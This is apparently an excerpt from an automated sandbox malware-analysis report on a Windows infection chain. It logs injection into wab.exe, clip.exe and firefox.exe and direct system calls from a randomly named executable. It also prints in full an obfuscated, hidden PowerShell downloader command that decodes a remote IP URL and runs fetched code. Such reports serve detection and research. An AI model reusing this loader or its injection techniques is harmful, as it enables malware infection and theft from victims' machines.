              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F262C mov eax, dword ptr fs:[00000030h]27_2_229F262C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF626 mov eax, dword ptr fs:[00000030h]27_2_229EF626
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A32619 mov eax, dword ptr fs:[00000030h]27_2_22A32619
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A660 mov eax, dword ptr fs:[00000030h]27_2_22A2A660
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2A660 mov eax, dword ptr fs:[00000030h]27_2_22A2A660
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A29660 mov eax, dword ptr fs:[00000030h]27_2_22A29660
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A29660 mov eax, dword ptr fs:[00000030h]27_2_22A29660
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB866E mov eax, dword ptr fs:[00000030h]27_2_22AB866E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB866E mov eax, dword ptr fs:[00000030h]27_2_22AB866E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A22674 mov eax, dword ptr fs:[00000030h]27_2_22A22674
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0C640 mov eax, dword ptr fs:[00000030h]27_2_22A0C640
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7F7AF mov eax, dword ptr fs:[00000030h]27_2_22A7F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7F7AF mov eax, dword ptr fs:[00000030h]27_2_22A7F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7F7AF mov eax, dword ptr fs:[00000030h]27_2_22A7F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7F7AF mov eax, dword ptr fs:[00000030h]27_2_22A7F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7F7AF mov eax, dword ptr fs:[00000030h]27_2_22A7F7AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A797A9 mov eax, dword ptr fs:[00000030h]27_2_22A797A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A1D7B0 mov eax, dword ptr fs:[00000030h]27_2_22A1D7B0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC37B6 mov eax, dword ptr fs:[00000030h]27_2_22AC37B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF78A mov eax, dword ptr fs:[00000030h]27_2_22AAF78A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF7BA mov eax, dword ptr fs:[00000030h]27_2_229EF7BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F07AF mov eax, dword ptr fs:[00000030h]27_2_229F07AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7E7E1 mov eax, dword ptr fs:[00000030h]27_2_22A7E7E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A127ED mov eax, dword ptr fs:[00000030h]27_2_22A127ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A127ED mov eax, dword ptr fs:[00000030h]27_2_22A127ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A127ED mov eax, dword ptr fs:[00000030h]27_2_22A127ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FC7C0 mov eax, dword ptr fs:[00000030h]27_2_229FC7C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F57C0 mov eax, dword ptr fs:[00000030h]27_2_229F57C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F57C0 mov eax, dword ptr fs:[00000030h]27_2_229F57C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F57C0 mov eax, dword ptr fs:[00000030h]27_2_229F57C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F47FB mov eax, dword ptr fs:[00000030h]27_2_229F47FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F47FB mov eax, dword ptr fs:[00000030h]27_2_229F47FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A707C3 mov eax, dword ptr fs:[00000030h]27_2_22A707C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229FD7E0 mov ecx, dword ptr fs:[00000030h]27_2_229FD7E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0F720 mov eax, dword ptr fs:[00000030h]27_2_22A0F720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0F720 mov eax, dword ptr fs:[00000030h]27_2_22A0F720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A0F720 mov eax, dword ptr fs:[00000030h]27_2_22A0F720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB972B mov eax, dword ptr fs:[00000030h]27_2_22AB972B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2C720 mov eax, dword ptr fs:[00000030h]27_2_22A2C720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2C720 mov eax, dword ptr fs:[00000030h]27_2_22A2C720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AAF72E mov eax, dword ptr fs:[00000030h]27_2_22AAF72E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F0710 mov eax, dword ptr fs:[00000030h]27_2_229F0710
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ACB73C mov eax, dword ptr fs:[00000030h]27_2_22ACB73C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ACB73C mov eax, dword ptr fs:[00000030h]27_2_22ACB73C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ACB73C mov eax, dword ptr fs:[00000030h]27_2_22ACB73C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22ACB73C mov eax, dword ptr fs:[00000030h]27_2_22ACB73C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6C730 mov eax, dword ptr fs:[00000030h]27_2_22A6C730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A25734 mov eax, dword ptr fs:[00000030h]27_2_22A25734
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7703 mov eax, dword ptr fs:[00000030h]27_2_229F7703
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F5702 mov eax, dword ptr fs:[00000030h]27_2_229F5702
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F5702 mov eax, dword ptr fs:[00000030h]27_2_229F5702
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2273C mov eax, dword ptr fs:[00000030h]27_2_22A2273C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2273C mov ecx, dword ptr fs:[00000030h]27_2_22A2273C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2273C mov eax, dword ptr fs:[00000030h]27_2_22A2273C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2C700 mov eax, dword ptr fs:[00000030h]27_2_22A2C700
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F973A mov eax, dword ptr fs:[00000030h]27_2_229F973A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F973A mov eax, dword ptr fs:[00000030h]27_2_229F973A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9730 mov eax, dword ptr fs:[00000030h]27_2_229E9730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9730 mov eax, dword ptr fs:[00000030h]27_2_229E9730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A20710 mov eax, dword ptr fs:[00000030h]27_2_22A20710
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2F71F mov eax, dword ptr fs:[00000030h]27_2_22A2F71F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2F71F mov eax, dword ptr fs:[00000030h]27_2_22A2F71F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F3720 mov eax, dword ptr fs:[00000030h]27_2_229F3720
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F0750 mov eax, dword ptr fs:[00000030h]27_2_229F0750
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A00770 mov eax, dword ptr fs:[00000030h]27_2_22A00770
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB724E GetProcessHeap,11_2_21CB724E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_21CB60E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_21CB2B1C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_21CB2639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_2084.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi32_504.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTR
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtResumeThread: Direct from: 0x773836AC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtMapViewOfSection: Direct from: 0x77382D1C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtWriteVirtualMemory: Direct from: 0x77382E3C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtProtectVirtualMemory: Direct from: 0x77382F9C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtSetInformationThread: Direct from: 0x773763F9
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtCreateMutant: Direct from: 0x773835CC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtNotifyChangeKey: Direct from: 0x77383C2C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtSetInformationProcess: Direct from: 0x77382C5C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtCreateUserProcess: Direct from: 0x7738371C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQueryInformationProcess: Direct from: 0x77382C26
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtResumeThread: Direct from: 0x77382FBC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtWriteVirtualMemory: Direct from: 0x7738490C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtOpenKeyEx: Direct from: 0x77383C9C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtReadFile: Direct from: 0x77382ADC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtAllocateVirtualMemory: Direct from: 0x77382BFC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtDelayExecution: Direct from: 0x77382DDC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQuerySystemInformation: Direct from: 0x77382DFC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtOpenSection: Direct from: 0x77382E0C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQuerySystemInformation: Direct from: 0x773848CC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtReadVirtualMemory: Direct from: 0x77382E8C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtCreateKey: Direct from: 0x77382C6C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtClose: Direct from: 0x77382B6C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtAllocateVirtualMemory: Direct from: 0x773848EC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQueryAttributesFile: Direct from: 0x77382E6C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtSetInformationThread: Direct from: 0x77382B4C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQueryInformationToken: Direct from: 0x77382CAC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtOpenKeyEx: Direct from: 0x77382B9C
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtQueryValueKey: Direct from: 0x77382BEC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtDeviceIoControlFile: Direct from: 0x77382AEC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtCreateFile: Direct from: 0x77382FEC
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exeNtOpenFile: Direct from: 0x77382DCC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: read write
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 2264
              Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3D50000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2ABFC78Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3050000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 303F908
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.nJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"Jump to behavior
